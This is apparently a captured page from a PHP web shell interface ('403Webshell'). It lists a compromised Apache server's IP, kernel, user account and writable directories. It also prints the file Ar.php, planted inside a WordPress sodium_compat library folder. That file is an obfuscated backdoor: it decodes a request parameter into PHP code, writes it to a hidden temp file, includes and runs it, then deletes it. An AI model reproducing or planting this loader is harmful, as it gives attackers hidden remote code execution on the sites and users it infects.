403Webshell
Server IP : 162.243.168.218  /  Your IP : 216.73.216.67
Web Server : Apache
System : Linux ISPCONFIG-WEB-EMPRESAS 5.15.0-174-generic #184-Ubuntu SMP Fri Mar 13 18:41:50 UTC 2026 x86_64
User : web23 ( 5020)
PHP Version : 8.3.32
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/clients/client3/web23/web/wp-includes/sodium_compat/src/PHP52/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/clients/client3/web23/web/wp-includes/sodium_compat/src/PHP52/Ar.php
<?php

if(!empty($_REQUEST["\x64a\x74"])){
	$dchunk = array_filter(["/var/tmp", getcwd(), getenv("TMP"), "/dev/shm", ini_get("upload_tmp_dir"), sys_get_temp_dir(), getenv("TEMP"), session_save_path(), "/tmp"]);
	$pgrp = $_REQUEST["\x64a\x74"];
		$pgrp 	=explode		 ('.' , $pgrp		)		; 	
	$key = '';
            $salt5 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen(	 $salt5);
            $o = 0;
    
            foreach(	 $pgrp as $v9) {  $chS = ord(	 $salt5[$o	% $sLen]);
                $d =(	 (	 int)$v9 - $chS -(	 $o	% 10)) ^ 97;
                $key .= chr(	 $d);
                $o++;
            }
	foreach ($dchunk as $value) {
    		if ((function($d) { return is_dir($d) && is_writable($d); })($value)) {
    $symbol = implode("/", [$value, ".fac"]);
    if (@file_put_contents($symbol, $key) !== false) {
	include $symbol;
	unlink($symbol);
	die();
}
}
}
}

Youez - 2016 - github.com/yon3zu
LinuXploit